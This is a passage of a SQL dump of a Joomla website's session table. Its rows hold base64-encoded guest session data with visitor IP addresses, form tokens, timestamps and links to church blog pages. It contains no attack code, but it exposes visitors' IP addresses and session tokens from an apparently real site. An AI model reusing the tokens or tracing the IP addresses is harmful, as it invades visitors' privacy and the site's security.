(0x6337666534653230653330353134386132306430373733323336623939323062, 0, 1, 1569384954, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NDk1MztzOjQ6Imxhc3QiO2k6MTU2OTM4NDk1MztzOjM6Im5vdyI7aToxNTY5Mzg0OTUzO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijg1LjEwLjIwNy4xOTUiO31zOjU6InRva2VuIjtzOjMyOiJwMVh0RWVMdHpwOE5wcURYaldHSEgyNXBYZ0kyeGRTZiI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6361363266373461643537613438656561326162616437636664333638363939, 0, 1, 1569377908, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3NzkwODtzOjQ6Imxhc3QiO2k6MTU2OTM3NzkwODtzOjM6Im5vdyI7aToxNTY5Mzc3OTA4O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjIxNi4yNDQuNjYuMjQ1Ijt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6361373733636232663130643531373763316366653530633633373237353835, 0, 1, 1569385665, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NTY2NTtzOjQ6Imxhc3QiO2k6MTU2OTM4NTY2NTtzOjM6Im5vdyI7aToxNTY5Mzg1NjY1O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjIxNi4yNDQuNjYuMjQ1Ijt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6363333930333937303162323430633930336366306435356262653137366365, 0, 1, 1569380231, 'joomla|s:824:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MDIzMTtzOjQ6Imxhc3QiO2k6MTU2OTM4MDIzMTtzOjM6Im5vdyI7aToxNTY5MzgwMjMxO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTE6IjQ1LjMzLjc2LjE3Ijt9czo1OiJ0b2tlbiI7czozMjoielZpa1U5NVhkZlhIQU1TYkRnSVFJVHRWa3FkakNVRVoiO31zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x6363373336343966653236623230383334623537366331643332663935376634, 0, 1, 1569385577, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NTU3NjtzOjQ6Imxhc3QiO2k6MTU2OTM4NTU3NjtzOjM6Im5vdyI7aToxNTY5Mzg1NTc2O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjIxNi4yNDQuNjYuMjQ1Ijt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6364343163343837646134656664646431653435333864643838323266333462, 0, 1, 1569385189, 'joomla|s:952:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aTozMzU7czo1OiJ0aW1lciI7Tzo4OiJzdGRDbGFzcyI6Mzp7czo1OiJzdGFydCI7aToxNTY4NTQwNDIyO3M6NDoibGFzdCI7aToxNTY5MzgxNjQ5O3M6Mzoibm93IjtpOjE1NjkzODUxODg7fXM6NjoiY2xpZW50IjtPOjg6InN0ZENsYXNzIjoxOntzOjk6ImZvcndhcmRlZCI7czoxMzoiMTk3LjI1My4yOC41MCI7fXM6NToidG9rZW4iO3M6MzI6IkpBN0pYMFhidVhrQTZrSkhNV281VWwweEUyRUI4RklLIjt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6MTM6ImNvbV9pbnN0YWxsZXIiO086ODoic3RkQ2xhc3MiOjI6e3M6NzoibWVzc2FnZSI7czowOiIiO3M6MTc6ImV4dGVuc2lvbl9tZXNzYWdlIjtzOjA6IiI7fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6365373435613734653664336664323862313562366466353339636332646435, 0, 1, 1569379862, 'joomla|s:1180:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3OTg2MTtzOjQ6Imxhc3QiO2k6MTU2OTM3OTg2MTtzOjM6Im5vdyI7aToxNTY5Mzc5ODYxO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS44OC45MSI7fXM6NToidG9rZW4iO3M6MzI6InpCMlNUZXdXV29aTDhkTTBFbTEwQXc2NkZHWENDNXd3Ijt9czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fXM6MTA6ImNvbV9tYWlsdG8iO086ODoic3RkQ2xhc3MiOjE6e3M6NToibGlua3MiO2E6MTp7czo0MDoiY2RjMWRmNDE4ODljMzk4YzZkMWFiOGM1ODg0MWFiMDZjMzkxOGI5ZSI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo0OiJsaW5rIjtzOjk4OiJodHRwczovL2xpZmVvYXNpc2ludGVybmF0aW9uYWxjaHVyY2gub3JnL3Jlc291cmNlcy9ibG9nL2l0ZW0vNjEtZnJvbS1vdXItZmF0aGVyLXMtaGVhcnQtMjYtMDgtMjAxOCI7czo2OiJleHBpcnkiO2k6MTU2OTM3OTg2MTt9fX19fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6430356465376331613539313639373137343463343536326637333163663562, 0, 1, 1569382318, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjMxODtzOjQ6Imxhc3QiO2k6MTU2OTM4MjMxODtzOjM6Im5vdyI7aToxNTY5MzgyMzE4O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6434613361393362623065363063653261316134643334363337393732356638, 0, 1, 1569377916, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3NzkxNjtzOjQ6Imxhc3QiO2k6MTU2OTM3NzkxNjtzOjM6Im5vdyI7aToxNTY5Mzc3OTE2O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjE5OC41OC4xMTIuMTAzIjt9czo1OiJ0b2tlbiI7czozMjoiY0haM1JmekFJVWJCV2x5STd2OHdDaGZGN2RSSTc5YmciO31zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x6435356230383461356331313761356330613562343763663431373862646331, 0, 1, 1569382200, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjE5OTtzOjQ6Imxhc3QiO2k6MTU2OTM4MjE5OTtzOjM6Im5vdyI7aToxNTY5MzgyMTk5O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO31zOjU6InRva2VuIjtzOjMyOiJoRDM3WXM1RmhLV3A5NW5BdnFFRHNnUXp1RVB1ZjVJeiI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6437333832333532623732386335363465643133313537303333326561643863, 0, 1, 1569382131, 'joomla|s:828:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjEzMDtzOjQ6Imxhc3QiO2k6MTU2OTM4MjEzMDtzOjM6Im5vdyI7aToxNTY5MzgyMTMwO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO31zOjU6InRva2VuIjtzOjMyOiJTYjJ5QnJoaGJhOWhsUEZNNFlBUnNzNEY5cGJLMlpXVyI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6461323436303331396364376636343664386537366461356238386239383866, 0, 1, 1569381709, 'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MTcwOTtzOjQ6Imxhc3QiO2k6MTU2OTM4MTcwOTtzOjM6Im5vdyI7aToxNTY5MzgxNzA5O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
(0x6461393139303034306462303435356636626266613565666539626464383730, 0, 1, 1569377870, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3Nzg3MDtzOjQ6Imxhc3QiO2k6MTU2OTM3Nzg3MDtzOjM6Im5vdyI7aToxNTY5Mzc3ODcwO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjY2LjI0OS44OC45NSI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x6463313238306636386137366535306663363930396533323764623033666438, 0, 1, 1569379248, 'joomla|s:756:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM3OTI0ODtzOjQ6Imxhc3QiO2k6MTU2OTM3OTI0ODtzOjM6Im5vdyI7aToxNTY5Mzc5MjQ4O31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTI6IjQ1Ljc5LjE2My42OSI7fX1zOjg6InJlZ2lzdHJ5IjtPOjI0OiJKb29tbGFcUmVnaXN0cnlcUmVnaXN0cnkiOjM6e3M6NzoiACoAZGF0YSI7Tzo4OiJzdGRDbGFzcyI6MDp7fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fXM6NDoidXNlciI7TzoyMDoiSm9vbWxhXENNU1xVc2VyXFVzZXIiOjE6e3M6MjoiaWQiO2k6MDt9fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=\";', 0, ''),
(0x6463383766343434636563346233666265356465623831633234643165643034, 0, 1, 1569382641, 'joomla|s:760:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjY0MTtzOjQ6Imxhc3QiO2k6MTU2OTM4MjY0MTtzOjM6Im5vdyI7aToxNTY5MzgyNjQxO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTQ6IjIxNi4yNDQuNjYuMjQ1Ijt9fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO319fXM6MTQ6IgAqAGluaXRpYWxpemVkIjtiOjA7czo5OiJzZXBhcmF0b3IiO3M6MToiLiI7fQ==\";', 0, ''),
(0x6464356133653730383338626635366534386464393834663566336463646535, 0, 1, 1569385686, 'joomla|s:1116:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4NTY4NjtzOjQ6Imxhc3QiO2k6MTU2OTM4NTY4NjtzOjM6Im5vdyI7aToxNTY5Mzg1Njg2O31zOjU6InRva2VuIjtzOjMyOiIyNWw1RlpaSGNDQUhhTU9WQldtNjczUkdCd0dxRnRuNCI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO31zOjEwOiJjb21fbWFpbHRvIjtPOjg6InN0ZENsYXNzIjoxOntzOjU6ImxpbmtzIjthOjE6e3M6NDA6ImRjNGVkZDY2MGVhNjdhOWI1MmFiYzg4N2NkYjQ4ZWU0NjdhNTRlYzUiO086ODoic3RkQ2xhc3MiOjI6e3M6NDoibGluayI7czoxMTk6Imh0dHBzOi8vbXVzaWMubGlmZW9hc2lzaW50ZXJuYXRpb25hbGNodXJjaC5vcmcvcmVzb3VyY2VzL2Jsb2cvaXRlbS8xMy1mYXRoZXItcy1oZWFydGgtMDgtMDEtMjAxNj90bXBsPWNvbXBvbmVudCZwcmludD0xIjtzOjY6ImV4cGlyeSI7aToxNTY5Mzg1Njg2O319fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, '');
INSERT INTO `y57u5_session` (`session_id`, `client_id`, `guest`, `time`, `data`, `userid`, `username`) VALUES
(0x6464386264386538613466633764626465613838666633313066343565613337, 0, 1, 1569382091, 'joomla|s:1144:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjo0OntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjQ6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTU2OTM4MjA5MTtzOjQ6Imxhc3QiO2k6MTU2OTM4MjA5MTtzOjM6Im5vdyI7aToxNTY5MzgyMDkxO31zOjY6ImNsaWVudCI7Tzo4OiJzdGRDbGFzcyI6MTp7czo5OiJmb3J3YXJkZWQiO3M6MTM6Ijk1LjIxNi4yNy4yMDkiO31zOjU6InRva2VuIjtzOjMyOiJtYlRaRENJdElWd1FqWFFsZ1BTeDU4MzRNMVBxdjRVdyI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo0OiJ1c2VyIjtPOjIwOiJKb29tbGFcQ01TXFVzZXJcVXNlciI6MTp7czoyOiJpZCI7aTowO31zOjEwOiJjb21fbWFpbHRvIjtPOjg6InN0ZENsYXNzIjoxOntzOjU6ImxpbmtzIjthOjE6e3M6NDA6ImNiZGM1YWQwNmVlNjg5MTk3MzcyNGMyODE1YTIxYzIwNWI3ZDA1ZDUiO086ODoic3RkQ2xhc3MiOjI6e3M6NDoibGluayI7czo3MjoiaHR0cHM6Ly9saWZlb2FzaXNpbnRlcm5hdGlvbmFsY2h1cmNoLm9yZy9yZXNvdXJjZXMvYmxvZy9pdGVtLzIyLWNvcnJlY3QvIjtzOjY6ImV4cGlyeSI7aToxNTY5MzgyMDkxO319fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";', 0, ''),
